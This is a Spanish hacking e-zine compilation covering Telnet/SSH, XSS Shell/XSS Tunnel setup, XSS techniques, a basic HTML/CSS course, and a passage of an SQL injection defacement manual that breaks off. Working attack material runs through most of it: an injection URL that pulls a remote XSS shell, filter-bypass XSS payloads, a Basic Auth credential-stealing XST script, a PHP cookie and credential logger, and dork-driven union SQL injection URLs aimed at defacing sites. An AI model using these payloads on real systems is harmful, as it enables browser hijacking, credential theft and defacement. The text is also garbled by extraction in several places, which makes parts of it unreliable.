Network (Telnet) es un protocolo de red que sirve para
acceder a otra maquina (servidor) para hacer uso remoto de esta. Es decir para
hacer manejo de la maquina como si nosotros estuviéramos delante de ella.
Esto nos da el potencial de poder usar los recursos de esta maquina
(procesador o RAM ) sin levantarnos de la silla en el sótano de nuestra madre…
Las direcciones TELNET tienen el formato conocido por todos de la forma
algo.host.ext o una simple IP XXX.XXX.XXX.XXX acompañada de un número al
final que indica el puerto, por defecto el 23.
Ejemplo:
locis.loc.gov 23
2009.85.171.100 23
¿Cómo usar Telnet?
Casi todos los sistemas operativos tiene un cliente Telnet nativo /* Digo casi
todos por que me acabo de dar cuenta que Windows Vista no contiene el fichero
telnet.exe en System32, increible pero cierto, anótenselo para recordar las
Micropend%#@$ de Win. Vista */
En todo caso clientes Telnet sobran y el mejor ejemplo es el Putty, el cual se
puede encontrar con facilidad en la tiendita de la esquina ;).
Continuando, conectarse mediante Telnet no es complicado ni necesitas saber
muchos comandos, solo daré un ejemplo ya que esto solo pretende ser un
breviario cultural para iniciar.
Abriendo una pagina web desde consola de windows.
C:\> Telnet /*Ejecutamos el cliente*/
Telnet: \>open 198.87.182.161 23
Connected to ejemplo.gov
Escape character is '^]'.
En este ejemplo solo pedimos abrir la dirección 198.87.182.161 en el puerto 23
mediante el comando open, después nos arroja el mensaje de conectado y nos
dice que el carácter de escape (salida) es ^.
Hasta ahora todo bonito, podemos conectarnos a servidores con unos cuantos
comandos y disfrutar de la consola todo sin salir de casa, pero entonces ¿Cuál
es el problema?, y la respuesta que siempre escuchamos: La seguridad.
Telnet abrió las pertas a toda una gama de posibilidades desde usuarios que
solo pretendían conectarse a la biblioteca del congreso hasta algunos mal
vivientes que descubrieron la cantidad de datos importantes que viajaban en la
red sin ningún tipo de protección.
Ese era un gran problema ya que aunque guardaras muy bien tu contraseña de
40 caracteres, después que esa información salía de tu ordenador, cualquier
persona que se encontrara “sniffeando” el tráfico de tu red podía leer en texto
plano toda tu actividad.
Fue entonces cuando en 1995 Tatu Ylönen propuso la primera versión del
protocolo ahora conocido como SSH.
ell
Secure Sh
Shell
SSH (Secure Shell) trabaja de forma similar a como se hace con Telnet. La
diferencia principal es que SSH usa técnicas de cifrado que hacen que la
información que viaja por el medio de comunicación vaya de manera no legible y
ninguna tercera persona pueda descubrir el usuario y contraseña de la
conexión ni lo que se escribe durante toda la sesión.
Esto represento una gran defensa (aunque no detuvo) a ataques del tipo MITM
(Man in the Middle), ARP spoofing, etc., haciendo que el problema de la
seguridad ahora dependiera de algoritmos matemáticos de encriptación
abriendo ahora nuevos problemas para el atacante en turno.
Secure Shell desde el punto de vista del atacante
Ahora vamos a tomar el punto de vista del atacante y veremos como se ve una
comunicación cifrada por el protocolo SSH. Espiaremos una comunicación
primero sin usar ningún tipo de protección y después con un cliente SSH.
Para esto escogí el Wicked-Evil Sniffer
Y el Open SSH
http://www.openssh.com/
Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra
propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio
en línea como ebbudy o la que gusten y analizaremos el trafico.
Terminando de loggearnos checamos el Logg file que se crea al marcar la
casilla de “Enable Loggining”, y busquemos entre sus entrañas.
Después de buscar un rato en los paquetes TCP, nos encontramos con una linda
cookie que crea ebuddy al loggearnos.
Como verán esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo
hash con la contraseña, que por lo menos ahora viajan en hash, en el primer
Messenger que saco Yahoo no hacia ni eso…
Esto no aclara el hecho que es importante que nadie pueda husmear en la
campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier
cartero pervertido pudiera ver lo que dice sin ningún inconveniente.
Ahora hagamos lo mismo pero usaremos el putty para conectarnos a un
servidor SMTP usando el Secure Shell.
En este caso se ve algo así:
TCP Header:
Source Port . . . . . . . 80
Dest Port . . . . . . . . -13376
Acknowledgement Number . 1142514760
Sequence Number . . . . . 570272387
Urgent Pointer . . . . . 0
Flags
ACK
PSH
Windows . . . . . . . . . 15
Checksum . . . . . . . . 39849
Data:
Þ“$^ î9o‰/*x{ª &##Íþ˜Äû‘ »‚hs ÙNò ùÐ| ZfÆ#]VÝÐËSò³ë'Ü(
2Aß1½cæX“
\ò?È jUhv ÚHù¨—ID ¯ ºgÚ'
Aquí esta en texto “plano”.
êtó ôÃ{$µ8%Seä^
En Hexadecimal se ve algo así:
Observando uno de los paquetes nos damos cuenta que el campo data no es
comprensible ya que esta encriptado, lo cual pone mas difícil las cosas,
dependiendo del cliente/servidor la comunicación estará encriptada en RSA de
64,128, 256 o hasta 1024bits.
Más información en:
http://www.openssh.com/
http://www.balug.org.ar/ssh.html
Autor : The JokeR
Agradecimientos a Kairoz por su paciencia
XSS TUNELING
Introducción al Tunneling
Introducció
¿Que es el tunneling?
El tunneling consiste en encapsular un protocolo de red sobre otro (protocolo
de red encapsulador) creando un túnel dentro de una red de computadoras. El
establecimiento de dicho túnel se implementa incluyendo una PDU determinada
dentro de otra PDU con el objetivo de transmitirla desde un extremo al otro del
túnel sin que sea necesaria una interpretación intermedia de la PDU
encapsulada. De esta manera se encaminan los paquetes de datos sobre nodos
intermedios que son incapaces de ver en claro el contenido de dichos paquetes.
El túnel queda definido por los puntos extremos y el protocolo de comunicación
empleado, que entre otros, podría ser SSH.
El uso de esta técnica persigue diferentes objetivos, dependiendo del problema
que se esté tratando, como por ejemplo la comunicación de islas en escenarios
multicast, la redirección de tráfico, etc.
Uno de los ejemplos más claros de utilización de esta técnica consiste en la
redirección de tráfico en escenarios IP Móvil. En escenarios de IP móvil, cuando
un nodo-móvil no se encuentra en su red base, necesita que su home-agent
realice ciertas funciones en su puesto, entre las que se encuentra la de capturar
el tráfico dirigido al nodo-móvil y redirigirlo hacia él. Esa redirección del tráfico
se realiza usando un mecanismo de tunneling, ya que es necesario que los
paquetes conserven su estructura y contenido originales (dirección IP de origen
y destino, puertos, etc.) cuando sean recibidos por el nodo-móvil.
El Tunneling se basa en tres protocolos
1. El protocolo del Carrier
Es el protocolo usado por la red que esta transportando la información
2. En protocolo del encapsulamiento (empaquetamiento)
Es el protocolo que aplica al envoltorio del paquete enviado, y según el
tipo será más o menos seguro, pudiendo ser GRE, IPSec, L2F, PPTP,
L2TP, ... Siendo el IPSec el más seguro entre los populares.
3. El protocolo pasajero
Es el protocolo del paquete de información que se envía dentro del
envoltorio, es decir, el paquete original de información. Los "protocolos
pasajero" habituales son IPX, NetBeui e IP.
El Tunneling tiene implicaciones muy importantes para las VPNs. Por ejemplo,
usted puede enviar un paquete que utiliza un protocolo no soportado por
Internet (por ejemplo el NetBeui de Microsoft) envuelto por un paquete IP que si
puede ser enviado por Internet. También puede enviar un paquete destinado a
una IP de una red privada (no perteneciente a Internet y por tanto no localizable)
envuelto por un paquete IP con una dirección pública que si encontrará su
destino en Internet.
En un túnel de una VPN de punto-a-punto, GRE (Generic Routing Encapsulation)
será el protocolo de encapsulamiento más habitual, a fin de poder pasar un
paquete de cualquier protocolo nativo envuelto en un paquete IP enviable por
Internet. Esto incluye información de que tipo de paquete se está encapsulando
e información de la conexión entre el cliente y el servidor.
Si se precisa seguridad avanzada, en vez de GRE se utilizará IPSec en modo
Túnel siendo un protocolo de encapsulamiento seguro tanto en conexiones que
unen oficinas como en conexiones de un usuario a una oficina porque además
de encriptar la información es eficiente autentificando los usuarios.
En accesos de un usuario a una oficina, es muy habitual encontrar PPP. El PPP
es parte del TCP/IP, que se usa básicamente para encapsular el protocolo del
paquete original en uno transportable por Internet.
ándose en el PPP:
La siguiente lista de protocolos se ha creado bas
basá



L2F (Layer 2 Forwarding)
Desarrollado por Cisco, L2F utilizara cualquier esquema de
autentificación soportado por el PPP
PPTP (Point.to.Point Tunneling Protocol)
El PPTP fue creado por el foro PPTP, un consorcio de empresas líderes en
comunicaciones que soporta encriptaciones de 40 y de 128 bits y
cualquiera de los sistemas de autentificación del PPP
L2TP (Layer 2 Tunneling Protocol)
L2TP es el producto de la cooperación entre varios miembros del foro
PPTP, y combina las prestaciones del PPTP y el L2TP así como el IPSec.
El L2TP puede ser usado como un protocolo de Túnel tanto para VPNs de unión
de delegaciones (redes de delegaciones) como para el acceso de usuarios
remotos, de hecho, el L2TP puede usarse entre :



El cliente y el router
Entre el NAS y el router
Entre un router y otro
CROSS-SITE SCRIPTING (XSS)
XSS es un ataque basado en la explotación de vulnerabilidades del sistema de
validación de HTML incrustado
Para más información
http://rapidshare.com/files/179568239/XSS_by_Max_p0wer.doc
XSS TUNNELING
Para comprender XSS TUNNEL y cómo funciona, debe en primer lugar
entender lo que es y cómo funciona.
é es un canal XSS?
¿Qu
Qué
XSS es un canal interactivo de un canal de comunicación entre dos sistemas
que es abierto por un ataque XSS. A nivel técnico, es un tipo de AJAX
solicitud que pueden obtener los comandos, enviar respuestas atrás y es capaz
de hablar
entre dominios.
é es la xss Shell?
¿Qu
Qué
XSS Shell es una herramienta que puede ser usado para configurar un canal
XSS entre una víctima
y un atacante para que un atacante pueda controlar el navegador de la víctima
mediante el envío de
comandos. Esta comunicación es bidireccional.
Para obtener el XSS Shell a trabajar a un atacante tiene que inyectar el XSS
Shell de JavaScript
de referencia por medio de un ataque XSS. El atacante es capaz de controlar la
víctima
navegador. Después de este punto, el atacante puede ver las peticiones, las
respuestas y es capaz de
encargar el navegador de la víctima para llevar adelante las peticiones etc.
Un ataque de inyección de la muestra se muestra a continuación;
http://foro.level-23.org/q = "> <script src = "http://xssshellserver/xssshell.asp">
</ script>
¿Cómo funciona la xss Shell?
XSS Shell es una aplicación que consta de tres partes principales.
En primer lugar, el lado del servidor es parte de la Shell coordina el XSS XSS
Shell entre un
agresor y la víctima. Es una aplicación del lado del servidor y requiere un ASP y
IIS
servidor Web. Utiliza una base de datos de MS Access como de almacenamiento.
La segunda parte de la herramienta es el lado del cliente y por escrito en
JavaScript. Esto carga en el
El navegador de la víctima y se encarga de la recepción y el tratamiento de los
comandos
junto con proporcionar el canal entre la víctima y el agresor. Este código
La parte final de la XSS Shell es la interfaz de administración. Un atacante puede
enviar
nuevos comandos y recibir las respuestas de una víctima (s) de forma
instantánea desde el navegador
esta interfaz. Una vez más, es ASP y requiere IIS.
Todos los pasos siguientes no esperar el uno para el otro y están
constantemente buscando respuestas y
solicitudes dentro de los retrasos de tiempo especificado.
1. Un atacante infecta una página Web con una persistente o reflejado (temporal)
de XSS
pide que ataque XSS Shell remoto JavaScript.
2. La víctima sigue un enlace o visiten la página y ejecuta el código JavaScript
en
ese dominio.
3. El navegador de la víctima comienza a realizar peticiones al periódico XSS
Shell
Servidor y busca nuevos comandos.
4. Cuando la víctima recibe un nuevo navegador como comando (Obtener
cookies,
Ejecutar JavaScript personalizado, Obtener clave de registro de datos etc.), es
procesada y
devuelve los resultados a la XSS Shell.
5. El atacante puede llevar a nuevos comandos víctima (s) de navegador y ver
los
resultados XSS Shell de la interfaz de administración.
é es mejor que el cl
ásico Ataque XSS?
¿Por qu
qué
clá
• Un atacante tendría más de un disparo. Después de controlar una víctima (s)
navegador el atacante es capaz de decidir su siguiente movimiento sobre la
base de las respuestas y
el entorno actual.
• Le permite pasar por alto la siguiente;
o restricciones de propiedad intelectual,
o básica / NTLM o autenticación basado similares autenticaciones.
• Dado que es la intención de enviar de alerta (“0wned!") ¡A miles de víctimas y
construir una botnet temporal XSS potencia!
é es XSS túneles?
¿Qu
Qué
XSS de túneles es el túnel de tráfico HTTP a través de un canal a usar XSS
prácticamente cualquier aplicación que admita proxies HTTP.
¿Qué es XSS túnel?
XSS túnel es el Proxy HTTP estándar que se sienta en un sistema del atacante.
Cualquier herramienta
que está configurado para utilizar el túnel que su tráfico a través del canal
activo en XSS
el XSS Shell servidor. XSS convierte el túnel de la solicitud y responde
transparente para validar las respuestas de HTTP y XSS Shell solicitudes.
XSS túnel está escrito en. NET y requiere. NET Framework para trabajar. Se
trata de una licencia GPL
Solicitud de licencia de código abierto.
Beneficios de XSS túneles
• Se permite el uso de prácticamente todas las herramientas que soportan
proxies HTTP!
• Es posible utilizar herramientas automatizadas como Nikto, Inyectores SQL,
HTTP bruta
forcer contra la propiedad intelectual de las zonas restringidas de la Web,
• Permite la configuración de su navegador locales para utilizar el túnel y XSS
navegar por la página Web con una víctima de los poderes de su propio
navegador, y
no implica el uso de cualquier tipo de cookie complicado / IP / agente de usuario
basado en los controles,
• Es muy bueno para demostrar el resultado de un ataque XSS.
¿Cómo Trabaja el XSS Túnel?
1. XSS El túnel conecta a un determinado XSS Shell y obtiene el actual
Identificador activo (a la víctima a ser controlado)
2. El local de cliente HTTP (navegador, etc. Nikto) envía peticiones HTTP al XSS
Túnel
o El Túnel XSS convierte peticiones HTTP en el que pide la
XSS Shell pueda comprender y procesar. A continuación, envía las solicitudes al
XSS Shell Server.
XSS Shell o El servidor guarda esta petición a su base de datos (Todas estas
solicitudes de trabajo sólo para una determinada víctima por el túnel de XSS.
Este ID
puede verse en el salpicadero del túnel XSS).
3. El XSS Shell Cliente (que reside en JavaScript en el navegador de la víctima)
realiza periódicamente las solicitudes de XSS Shell Server y para los nuevos
controles
comandos para el proceso.
Este proceso requiere entre dominios leer. XSS Shell utiliza el mando a distancia
JavaScript para eludir la carga del mismo origen, la política de restricciones.
O Si hay nuevos comandos, que las cargas y los procesos y envía el
las respuestas (puede ser simplemente un código de confirmación o el código
fuente de un
página o un archivo binario) para XSS Shell servidor.
Ejecutar comandos y respuestas en una moda multihilo.
4. XSS en el túnel de la caché local, el control de la XSS Shell Server para una
respuesta para
previamente asignados solicitudes. Si hay una respuesta que convierte a la
respuesta
válida la respuesta HTTP y la envía a la aplicación cliente.
Por defecto, el túnel de XSS cachés JavaScript, CSS y archivos de imagen para
una mejor
rendimiento. Esto es realmente necesario si se utiliza el XSS túnel con un
navegador. Si
pidió a los recursos ya está en la caché XSS túnel y se puede
obtenidos de la memoria caché local y enviado a la aplicación cliente.
Almacenamiento en caché se puede desactivar la caché o se pueden gestionar
desde la interfaz de usuario
de XSS Túnel.
Un proceso de ataque
1. XSS Shell configurar el servidor,
2. XSS configurar el túnel para utilizar el servidor de XSS Shell,
3. Preparar el ataque XSS (someterse a un sitio Web vulnerables o enviar un
enlace
etc.),
4. XSS lanzar el túnel y esperar a que una víctima,
5. Configurar la herramienta o el navegador para utilizar el túnel de XSS,
6. Cuando vea víctima XSS en el túnel, de comenzar a utilizar su navegador /
herramienta
dirigidos para el dominio.
¿Como ejecutar lo aprendido?
Necesitamos:
1 nuestra xss Shell y túnnel la podemos descargar directamente de
http://rapidshare.de/files/43005148/xssshell-xsstunnell.rar.html
Un hosting que soporte asp como por ejemplo http://www.7host.com
Una vez extraídos el rar tenemos las carpetas con la Shell y el tunnel
Procederemos a configurar nuestra Shell
En Server config colocaremos el link de nuestro Host
En el ejemplo seria http://free.7host05.com/level23
Una vez cambiado procedemos a guardar.
Ahora vamos a la carpeta admin. Y procederemos a modificar el database file
editamos el archivo de db.asp
Donde dice database configuration hay un enlace C:\XSS Shell\XSSShell060\db\shell.mdb este enlace deberá ser cambiado por la dirección de nuestro
hosting pero como saber cual enlace es pues abriremos un block de notas y
escribiremos lo siguiente
<%
Response.Write Server.MapPath(".")
%>
La guardamos como test.asp y lo subimos al hosting
Luego abrimos la dirección y encontraremos un a dirección cópienla
Y remplazaremos la dirección C:\XSS Shell\XSSShell-060
Shell\XSSShell-060\db\shell.mdb
por la dada en nuestro hosting quedaría así
E:\user1\level23\db\shell.mdb
Una vez tenemos todo configurado subimos todos los archivos y carpetas de
nuestra shell
Ya subido los archivos procederemos a entre a nuestra shell
http://free.7host05.com/level23/admin/Default.asp
la contraseña por defecto es w00t pero puede ser cambiada en el archivo
db.asp
ya tendremos nuestra shell montada
Ahora primero provaremos nuestra shell ingrasamos a la carpeta sample_victim
para provar si funciona nuestra shell. Nuestro ejemplo sera
http://free.7host05.com/level23/sample_victim/
Les debera aparecer esta pagina
Antes expliare en que consiste vemos el codigo de fuente encontraremos esto
ese es el codigo malicioso
que inyectamos con xss ahora vemos que hay que configurar el ejemplo.
Vamos a la carpeta sample_victim en nuestro pc y modificamos el archivo
default.asp, buscamos nuestro codigo malisioso y lo cambiamos por nuestra
shell en nuestro caso es http://free.7host05.com/level23/xssshell.asp
Guardamos los cambios y remplazamos los archivos del host
Volvemos abrir el link de sample victim
Y veremos que en nuestra shell se esta haciendo nuestro tunnel
Ya vemos que nuestro tunel sirve ahora vamos a configurar nuestro xss tunel
Abrimos nuestro xsstunel.exe
En options colocaremos la dirección de nuestra shell y el password y testeamos
si nos conecta con el server
Ahora iniciaremos el xss tunel y nos conectara con la shell
Ahora debemos configurar nuestro Proxy para nuestro tunel entramos a
iexplorer herramientas- opciones de internet->conexiones en el buton
configuración lan
Seleccionaremos en servidor proxy y dejaremos como esta en la imagen Y ya
tenemos nuestra shell y el xsstunel.
Autor : Max p0wer ”frozenfew
frozenfew””
Introducción a XSS
Introducció
XSS es un ataque basado en la explotacion de vulnerabilidades del sistema de
validacion de HTML incrustado. Su nombre, del ingles “Cross Site Scripting”, y
renombrado XSS para que no sea confundido con las hojas de estilo en cascada
(CSS), originalmente abarcaba cualquier
ataque que permitiera ejecutar codigo de “scripting”, como VBScript o
javascript, en el contexto de otro dominio. Recientemente se acostumbra a
llamar a los ataques de XSS “HTML Injection”, sin embargo el termino correcto
es XSS. Estos errores se pueden encontrar en cualquier aplicacion HTML, no se
limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS,
o incluso el navegador en si-. El problema esta en que normalmente no se
validan correctamente los datos de entrada que son usados en cierta aplicacion.
Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de
error, comentarios) o indirecta (redirecciones, framesets). Cada una se trata de
forma diferente.
* Directa: Este tipo de XSS es el que normalmente es censurado; asi- que es
muy poco comun que puedas usar tags como <script> o <iframe>
* Indirecta: Esta es un tipo de vulnerabilidad, muy comun y muy poco
explotada. Consiste en modificar valores que la aplicacion web utiliza para
pasar variables entre dos paginas, sin usar sesiones.
Indirecta
Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una
cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o
addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo
coloca TODO lo que esta en color negro en la barra de direcciones, y presiona
Enter.
javascript:for(var g in document.cookie.split
(';'))void(prompt("Valor de cookie "+document.cookie.split
(';')[g].split
(’=')[0],document.cookie.split(’;')[g].split(’=')[1]));alert
(”Cookies:\n”+document.cookie.replace(/;/,”\r\n”));
Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la
cookie se borrara.
¿Que podemos ver con este ejemplo? Que podemos meter comandos javascript
solo modificando una URL.
Usando FrameSets
Regresemos al ejemplo del frameset, que segun la pagina que coloques te crea
un frame a esa pagina. ¿Que pasara si pones en esa URL?
javascript:while(1)alert("level-23.org!");
Y el enlace lo pone un intruso hacia un foro. Un navegador incauto, va a verlo y
dira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultado
tendra un loop infinito.
Hasta ahi- llegan los newbies. Pero vamos a ponernos en la piel de un experto.
Se trata de colocar un script que tome tu cookie, y mande un mp al
administrador, o incluso, que borre todos los mensajes de un foro.
El robo de cookies es lo mas basico, y tiene como objetivo robar la cookie. ¿Y
eso de que sirve? Tengo el PHPSESSID, y si el usuario cierra sesion no sirve de
nada.
Cierto, pero con el uso de la libreria cURL un usuario malintencionado, podria al
recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante
cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña.
Otro uso comun para estas vulnerabilidades es lograr hacer phishing; o colocar
un exploit.
Quiere ello decir que tu ves la barra de direcciones, y ves que estas en una
pagina, pero realmente estas en otra. Introduces tu contraseña y la fastidiaste.
Lo peor son los sitios de descarga, que colocan en la misma URL el sitio de
objetivo. Esas paginas web son vulnerables a ataques XSS indirectos. O sea que
un intruso puede colocar una imagen con enlace al sitio malicioso, y se ejecuta,
sin que el usuario lo sepa.
Mensaje personalizado
La tecnica solo funciona con imagenes:
error.php?error=Usuario%20Invalido
Esa pagina es vulnerable a XSS indirecto.
Un <script> que cree otra sesion bajo otro usuario y tu sesion actual la mande al
atacante (lo explicado de cURL mas arriba), puede causar estragos.
Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y
escribe otra cosa:
<script> document.documentElement.innerHTML="NADA";</script>
Directa
Funciona localizando puntos debiles en la programacion de los filtros. Asi que si,
por ejemplo, logran quitar los <iframe>, <script>, el atacante siempre puede
poner un <div> malicioso, o incluso un <u> o <s>. Tags que casi siempre estan
permitidos.
Ejemplos de Scripts donde no son comunes de encontrar
<BR SIZE="&{alert('level-23')}">
<FK STYLE="behavior: url(http://tusitio/xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('e-zine'))">
Usar estilos es increiblemente facil, y lo malo es que muchos filtros son
vulnerables. Se puede crear un DIV con background-image:
url(javascript:eval(this.fu)) como estilo y añadir al DIV un campo llamado fu que
contenga el codigo a ejecutar, como por ejemplo alert(’anti-emo’):
<div fu="alert('anti-emo');"
STYLE="background-image: url(javascript:eval(this.fu))">
Ajax
Este es un tipo de XSS no tan conocido, pero peligroso. Se basa en usar
cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y usarlo
para enviar contenido POST, GET, sin conocimiento del usuario.
El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticacion
de un sistema basado en Autenticacion Basica (Basic Auth). Solo falta
decodificarlo, pero es mas facil mandarlo codificado al registro de contraseñas.
La codificacion es base64.
Script para obtener credenciales en tipo BASIC
Esta tecnica tambien es llamada XST Cross Site Tracing XST
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
// para firefox,
es: var xmlhttp = new XMLHttpRequest();
xmlhttp.open("TRACE","./",false);xmlhttp.send(null);
str1=xmlhttp.responseText;
splitString = str1.split("Authorization: Basic ");
str2=splitString[1];
str3=str2.match(/.*/)[0];
alert(str3);
Por cuestiones de seguridad.. Firefox y IExplorer 7 no permiten usar el metodo
TRACE.
log.php para registrar cookies
<?php$archivo = fopen('log2.htm','a');
$cookie = $_GET['c'];$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD:
'.htmlentities(base64_decode($usuario)));
fwrite($archivo, '<br>Cookie: '.htmlentities($cookie).'<br>Pagina:
'.htmlentities($re));
fwrite($archivo, '<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
Autor : Max p0wer ”frozenfew
frozenfew””
ón en
Curso Básico de Programaci
Programació
HTML y CSS
CONTENIDO
Introducción al lenguaje HTML
Que se necesita para hacer una página web
Composición del lenguaje
Estructura básica de un sitio web
Encabezados
Párrafos en HTML
Saltos de línea
Líneas Horizontales
Insertar imágenes en HTML
Atributo ALT
Uso de la etiqueta <a>
Hipervínculos a un lugar del mismo documento
Los Textos y sus atributos
Etiqueta <Font>
Listas en HTML
Comentarios en HTML
Creación de tablas en HTML
Formularios en HTML
Cajas de texto
Propiedades de las cajas de texto y atributos
Botones
Cajas de selección
Introducción a CSS
Que es CSS
Formas de usar CSS en un documento HTML
Comentarios en CSS
INTRODUCCIÒN AL LENGUAJE HTML
INTRODUCCIÒ
HTML (HyperText Markup Language), es un lenguaje para escribir páginas web,
extremadamente fácil de aprender, ya que trabaja con etiquetas que procesan laos
diferentes módulos o componentes de un sitio web, estas etiquetas contienen los
llamados atributos, que son los que hacen que el aspecto del modulo cambie.
Que se necesita para hacer una página web?
Para crear un sitio web en HTML necesitamos de un editor podemos decir que el editor
más fácil de conseguir es un editor de texto, en Windows se puede usar el notepad
notepad,
pero para facilitar las tareas podemos usar editores avanzados como lo son:

Microsoft Office FrontPage

Adobe Dreamweaver
Este último es bastante recomendado ya que posee características que ayudan en el
manejo, desarrollo y personalización del sitio web.
ón del lenguaje
Composició
Composici
HTML es un lenguaje como ya hemos dicho que trabaja con etiquetas y atributos la
forma correcta de escribir una etiqueta es:
<etiqueta>
Aquí va el texto </etiqueta>
Como se observa primer abrimos un psicoparentesis (< >) y lo cerramos dentro de
estos va la etiqueta y por ultimo se utiliza la misma etiqueta para cerrar o finalizar pero
esta vez con un “/” que indica el final de esta etiqueta.
Estructura básica de un sitio web
Bien para indicar la estructura básica de un sitio web debemos casi siempre utilizar
esta línea de etiquetas:
<html>
<head>
<title> </title>
</head>
<body>
</body>
</html>
Explicación:
Etiqueta
<html>
<head>
<title>
<body>
Explicación
Indica el inicio de
un nuevo
documento html
Indica la cabecera
del documento
Allì se coloca el
titulo del
documento
Después de la
etiqueta body va
todo el resto de la
página web
imágenes texto etc.
Encabezados
Los encabezados son los títulos de cada página dentro del documento, existen varios
niveles de encabezados:
<h1>
Encabezado
<h2>
Encabezado
<h3> Encabezado
<h4> Encabezado
<h5> Encabezado
<h6>
Párrafos en HTML
Encabezado
Bueno existen varias formas de crear espacios entre nuestros textos pero la forma
correcta de hacerlo es separar todo con párrafos, para ellos utilizamos la etiqueta <p>
<p> esto es un párrafo de prueba </p>
<p> Esto es otro párrafo </p>
Y si hacen la prueba verán que entre etiqueta hay espacios que separan los párrafos.
Saltos de línea
Muchas veces queremos separar alguna oración o alguna línea de texto o algún objeto
que se encuentre en nuestra página para eso usamos los saltos de línea y la siguiente
etiqueta al final de cada texto:
<br>
Lineas horizontales
Bueno una línea horizontal como ya su nombre lo indica es una llinea que separa la
página para insertarla debes usar esta etiqueta:
<hr>
ágenes en HTML
Insertar im
imá
Para insertar una imagen usamos la etiqueta <img>
Para insertar una imagen esta debe estar en la misma carpeta para usarlo de esta
forma o escribir la ruta:
<img src=
src=””ruta.gif
ruta.gif””></img>
Atributo ALT
Generalmente muestra un Tooltip cuando se pone el curso en un link es decir inserta
como un texto descriptivo su modo de uso es el siguiente:
<img src=”imagen.gif” alt=”texto descriptivo”></img>
Uso de la etiqueta <a>
Bueno la etiqueta <a> sirve para referirse a un link o una url, pero no funciona sola,
debe tener ciertos atributos, por ejemplo:
<a href=http://level-23.org> Texto </a>
Hipervíínculos a un lugar del mismo documento
Hiperv
Esto es a lo que llamamos anclas, con ellas puedes hacer que un link vaya a cierto lugar
de un documento, la forma de hacerlo es sencilla:
<a name=”nombreancla”>Texto o titulo</a>
Y para hacer un link que vaya directamente a ese lugar del documento sencillamente:
<a href=”#nombreancla”>Texto o titulo </a>
Noten que para llamar el ancla usamos el símbolo “#”.
Autor : Ghost
Manual Inyeccion Sql
Hola, soy eDeex_. Creo que ya muchos me conocen, y hoy os voy a explicar
sobre Deface, en concreto SQL injecction, y he decidido SQL injecction, por qué
es lo mas “fácil” de aprender, y por que la mayoría de las vulnerabilidades son
SQL.
& bueno, empecemos...
¿Qué es Deface?
El Deface / Defacing / Defacement es la modificación de una página web sin
autorización del dueño de la misma.
La mayoría de las veces logran defacear un sitio consiguiendo acceso mediante
alguna vulnerabilidad que el programador haya dejado en el mismo.
También por passwords débiles, problemas en el FTP, etc.
¿Qué es SQL Inyección?
Inyección SQL es una vulnerabilidad informática en el nivel de la validación de
las entradas a la base de datos de una aplicación. El origen es el filtrado
incorrecto de las variables utilizadas en las partes del programa con código
SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que
puede ocurrir en cualquier lenguaje de programación o de script que esté
incrustado dentro de otro.
¿Qué es un Dork?
Algo que usuarios malévolos escriben para encontrar máquinas vulnerables
Bueno ara vamos a la práctica, hoy, os voy a enseñar a como defacear una
website mediante un bug SQL.
Primero hay que tener un buen dorks SQL, por ejemplo.
“allinurl: .php?id= “
Sin las comillas. Ese Dork es el más básico pero hay muchísimos más, todo es
con tal de ir mirando.
Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34
Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle ‘.
Quedaría a si:
www.web.com/noticias.php?id=’
Si nos sale un error mysql , tipo este ;
Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource
in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5
No todos son así, pero tienen algo parecido. Bueno ya sabemos que es
vulnerable ara toca poner inyección. Lo principal es;
-1+union+all+select+0,1
Quedaría así ;
www.web.com/noticias.php?id=-1+union+all+select+0,1
Ara toca ir buscando, hasta que se te quite los errores, y te salgan números.
Para ir buscando tienes que ir añadiendo números , ejemplo:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7-Siempre al final de cada numero pon “--“ [Dos guiones] sin las comillas.
No siempre acaba en 7, puede acabar en 100, 200, quien sabe.
A mí, me ha salido los números en 7, y me ha tirado el 4, 6 y 7.
Ahora toca coger uno de ellos, el que sea, yo cojo el 4.
Ara tenemos que hacer lo siguiente:
Si as elegido el 4, borras el numero 4 y pones “table_name” sin las comillas y al
final pones;
+from+information_schema.tables—
Y nos quedaría a si:
www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables
—
Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal
mente sale al principio. Ara nos toca buscar tablas como “admin, root, login,
miembro, member, user, usuario, administrador, etc. “Y aviso, no es lo mismo
admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin sí.
Para buscar las tablas tienes que borrar los dos guiones finales y poner ;
+1,1-Y ir cambiando el primer 1 por los siguientes números, ejemplo:
www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
1,1-www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
2,1-www.web.com/noticias.php?id=1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
3,1-A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno,
nunca se sabe.
